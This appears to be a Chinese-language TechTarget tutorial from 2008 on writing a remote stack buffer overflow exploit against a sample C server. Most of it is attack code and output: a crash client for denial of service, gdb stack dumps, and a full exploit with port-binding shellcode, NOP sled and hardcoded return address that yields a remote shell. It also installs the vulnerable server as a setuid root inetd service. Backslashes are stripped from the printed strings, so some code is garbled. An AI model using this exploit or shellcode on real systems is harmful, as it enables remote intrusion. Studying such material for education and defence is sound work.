怎样写远程缓冲区溢出漏洞利用程序

日期: 2008-01-13 来源:TechTarget中国

  假设有一个有漏洞的服务器程序(vulnerable.c). 然后写一个exploit 来利用该漏洞,这样将能得到一个远程shell。

  一、理解有漏洞程序:

      #include
  #include
  #include
  #define BUFFER_SIZE 1024
  #define NAME_SIZE 2048
  int handling(int c)
  {
  char buffer[BUFFER_SIZE], name[NAME_SIZE];
  int bytes;
  strcpy(buffer, "My name is: ");
  bytes = send(c, buffer, strlen(buffer), 0);
  if (bytes == -1)
  return -1;
  bytes = recv(c, name, sizeof(name), 0);
  if (bytes == -1)
  return -1;
  name[bytes – 1] = ’’;
  sprintf(buffer, "Hello %s, nice to meet you!rn", name);
  bytes = send(c, buffer, strlen(buffer), 0);
  if (bytes == -1)
  return -1;
  return 0;
  }
  int main(int argc, char *argv[])
  {
  int s, c, cli_size;
  struct sockaddr_in srv, cli;
  if (argc != 2)
  {
  fprintf(stderr, "usage: %s portn", argv[0]);
  return 1;
  }
  s = socket(AF_INET, SOCK_STREAM, 0);
  if (s == -1)
  {
  perror("socket() failed");
  return 2;
  }
  srv.sin_addr.s_addr = INADDR_ANY;
  srv.sin_port = htons( (unsigned short int) atol(argv[1]));
  srv.sin_family = AF_INET;
  if (bind(s, &srv, sizeof(srv)) == -1)
  {
  perror("bind() failed");
  return 3;
  }
  if (listen(s, 3) == -1)
  {
  perror("listen() failed");
  return 4;
  }
  for(;;)
  {
  c = accept(s, &cli, &cli_size);
  if (c == -1)
  {
  perror("accept() failed");
  return 5;
  }
  printf("client from %s", inet_ntoa(cli.sin_addr));
  if (handling(c) == -1)
  fprintf(stderr, "%s: handling() failed", argv[0]);
  close(c);
  }
  return 0;
  }

  下面将编译并运行该程序:

      user@linux:~/ > gcc vulnerable.c -o vulnerable
  user@linux:~/ > ./vulnerable 8080
  ../vulnerable 8080 说明你能在8080端口运行该项服务
  user@linux~/ > gdb vulnerable
  GNU gdb 4.18
  Copyright 1998 Free Software Foundation, Inc.
  GDB is free software, covered by the GNU General Public License, and you are
  welcome to change it and/or distribute copies of it under certain conditions.
  Type "show copying" to see the conditions.
  There is absolutely no warranty for GDB. Type "show warranty" for details.
  This GDB was configured as "i386-suse-linux"…
  (gdb) run 8080
  Starting program: /home/user/directory/vulnerable 8080
 
  现在该程序监听8080端口并等待连接。

      user@linux:~/ > telnet localhost 8080
  Trying ::1…
  telnet: connect to address ::1: Connection refused
  Trying 127.0.0.1…
  Connected to localhost.
  Escape character is ’^]’.
  My name is: Robin
  , nice to meet you!
  Connection closed by foreign host.
  user@linux:~/ >

  看来没有什么破绽,但是这时gdb会在屏幕上显示:

  client from 127.0.0.1 0xbffff28c (访地址因不同机器类型而异)

  二、令有漏洞程序发生缓冲区溢出

  重新连上该服务,为 "My name is:…" 命令行提供超过1024个字节长的输入:

      user@linux:~/ > telnet localhost 8080
  Trying ::1…
  telnet: connect to address ::1: Connection refused
  Trying 127.0.0.1…
  Connected to localhost.
  Escape character is ’^]’.
  My name is: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAA

  连接将中断,让我们看看gdb的输出:

      Program received signal SIGSEGV, Segmentation fault.
  0x41414141 in ?? ()
  (gdb)
  // Don’t close gdb !!

  能够看出 eip 被设到了 0x41414141。0x41 代表一个"A",当我们输入1024个字节时,该程序会试图将字符串name[2048]拷入缓冲[1024]。因此,由于 name[2048] 大于1024字节,name 将会重写缓冲并重写已被存储的 eip,我们的缓冲将会是下列形式:

  [xxxxxxxx-name-2048-bytes-xxxxxxxxxx]

  [xxxxx buffer-only-1024-bytes xxx] [EIP]

  在你重写了整个返回地址后,函数将会跳转到错误的地址0x41414141,从而产生片断错误。

  现在为此程序写一个拒绝服务攻击工具:

      #include
  #include
  #include
  #include
  #include
  int main(int argc, char **argv)
  {
  struct sockaddr_in addr;
  struct hostent *host;
  char buffer[2048];
  int s, i;
  if(argc != 3)
  {
  fprintf(stderr, "usage: %s n", argv[0]);
  exit(0);
  }
  s = socket(AF_INET, SOCK_STREAM, 0);
  if(s == -1)
  {
  perror("socket() failedn");
  exit(0);
  }
  host = gethostbyname(argv[1]);
  if( host == NULL)
  {
  herror("gethostbyname() failed");
  exit(0);
  }
  addr.sin_addr = *(struct in_addr*)host->h_addr;
  addr.sin_family = AF_INET;
  addr.sin_port = htons(atol(argv[2]));
  if(connect(s, &addr, sizeof(addr)) == -1)
  {
  perror("couldn’t connect so servern");
  exit(0);
  }
  /* Not difficult only filling buffer with A’s…. den sending nothing more */
  for(i = 0; i < 2048 ; i++)
  buffer[i] = ’A’;
  printf("buffer is: %sn", buffer);
  printf("buffer filled… now sending buffern");
  send(s, buffer, strlen(buffer), 0);
  printf("buffer sent.n");
  close(s);
  return 0;
  }

  三、找到返回地址:

  打开gdb寻找 esp:

      (gdb) x/200bx $esp-200
  0xbffff5cc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff5d4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff5dc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff5e4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff5ec: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff5f4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff5fc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff604: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff60c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff614: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff61c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff624: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff62c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff634: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff63c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff644: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff64c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff654: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff65c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff664: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff66c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff674: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  0xbffff67c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
  —Type to continue, or q to quit—

  现在我们已经知道重写了整个缓冲,让我们试试几个地址。

  四、exploit代码结构

  1、找到 esp,然后找一个能绑定 shell 到端口的 sehllcode.

  2、创建一个大于1024字节的缓冲

  2、用 NOP 填滿整个缓冲:

  memset(buffer, 0x90, 1064);

  3、将 shellcode 拷入缓冲

  memcpy(buffer+1001-sizeof(shellcode), shellcode, sizeof(shellcode));

  4、在缓冲中消除零字节:

  buffer[1000] = 0x90; // 0x90 is the NOP in hexadecimal

  5、在缓冲未端拷贝返回地址:

      for(i = 1022; i < 1059; i+=4)
  {
  ((int *) &buffer[i]) = RET;
  // RET is the returnaddress we want to use… #define in the header

  6、在准备好的缓冲未端加入一个 零字节:

  buffer[1063] = 0x0;

  现在可以把它发送给有漏洞机器了。

      #include
  #include
  #include
  //Portbinding Shellcode
  char shellcode[] =
  "x89xe5x31xd2xb2x66x89xd0x31xc9x89xcbx43x89x5dxf8"
  "x43x89x5dxf4x4bx89x4dxfcx8dx4dxf4xcdx80x31xc9x89"
  "x45xf4x43x66x89x5dxecx66xc7x45xeex0fx27x89x4dxf0"
  "x8dx45xecx89x45xf8xc6x45xfcx10x89xd0x8dx4dxf4xcd"
  "x80x89xd0x43x43xcdx80x89xd0x43xcdx80x89xc3x31xc9"
  "xb2x3fx89xd0xcdx80x89xd0x41xcdx80xebx18x5ex89x75"
  "x08x31xc0x88x46x07x89x45x0cxb0x0bx89xf3x8dx4dx08"
  "x8dx55x0cxcdx80xe8xe3xffxffxff/bin/sh";
  //standard offset (probably must be modified)
  #define RET 0xbffff5ec
  int main(int argc, char *argv[]) {
  char buffer[1064];
  int s, i, size;
  struct sockaddr_in remote;
  struct hostent *host;
  if(argc != 3) {
  printf("Usage: %s target-ip portn", argv[0]);
  return -1;
  }
  // filling buffer with NOPs
  memset(buffer, 0x90, 1064);
  //copying shellcode into buffer
  memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode));
  // the previous statement causes a unintential Nullbyte at buffer[1000]
  buffer[1000] = 0x90;
  // Copying the return address multiple times at the end of the buffer…
  for(i=1022; i < 1059; i+=4) {
  * ((int *) &buffer[i]) = RET;
  }
  buffer[1063] = 0x0;
  //getting hostname
  host=gethostbyname(argv[1]);
  if (host==NULL)
  {
  fprintf(stderr, "Unknown Host %sn",argv[1]);
  return -1;
  }
  // creating socket…
  s = socket(AF_INET, SOCK_STREAM, 0);
  if (s < 0)
  {
  fprintf(stderr, "Error: Socketn");
  return -1;
  }
  //state Protocolfamily , then converting the hostname or IP address, and getting port number
  remote.sin_family = AF_INET;
  remote.sin_addr = *((struct in_addr *)host->h_addr);
  remote.sin_port = htons(atoi(argv[2]));
  // connecting with destination host
  if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
  {
  close(s);
  fprintf(stderr, "Error: connectn");
  return -1;
  }
  //sending exploit string
  size = send(s, buffer, sizeof(buffer), 0);
  if (size==-1)
  {
  close(s);
  fprintf(stderr, "sending data failedn");
  return -1;
  }
  // closing socket
  close(s);
  }

  五、使用 exploit:

  user@linux~/ > gcc exploit.c -o exploit

  user@linux~/ > ./exploit

  如果你得到了正确的返回地址,它将管用。

      user@linux~/ > telnet 3879
  id;
  uid=500(user) gid=500(user) groups=500(user)

  可以看出,我们成功了。

  六、取得 root 权限:

      user@linux~/ > su
  password: ******
  root@linux~/ > ls -ln vulnerable
  -rwxrwxr-x 1 500 500 14106 Jun 18 14:12 vulnerable
  root@linux~/ > chown root vulnerable
  root@linux~/ > chmod 6755 vulnerable
  root@linux~/ > ./vulnerable 

  七、进入 inetd.conf 中定义的服务

  将有漏洞程序拷入 /usr/bin/

      root@linux~/ > cp vulnerable /usr/bin/vulnerable
  root@linux~/ > vi /etc/services

  加入下面的信息:

      vulnerable 1526/tcp # defining port for our server program
  root@linux~/ > vi /etc/inetd.conf

  加入下面的信息:

  vulnerable stream tcp nowait root /usr/bin/vulnerable vulnerable 1526

  重启 inetd:

  root@linux~/ > killall -HUP inetd

  八、可能出现的问题:

  如果 exploit 无法使用,请考虑返回地址,用gdb进行测试:

      user@linux~/ > gdb vulnerable
  ……
  (gdb) run 

 

我们一直都在努力坚持原创.......请不要一声不吭,就悄悄拿走。

我原创,你原创,我们的内容世界才会更加精彩!

【所有原创内容版权均属TechTarget,欢迎大家转发分享。但未经授权,严禁任何媒体(平面媒体、网络媒体、自媒体等)以及微信公众号复制、转载、摘编或以其他方式进行使用。】

微信公众号

TechTarget微信公众号二维码

TechTarget

官方微博

TechTarget中国官方微博二维码

TechTarget中国

电子邮件地址不会被公开。 必填项已用*标注

敬请读者发表评论,本站保留删除与本文无关和不雅评论的权力。

相关推荐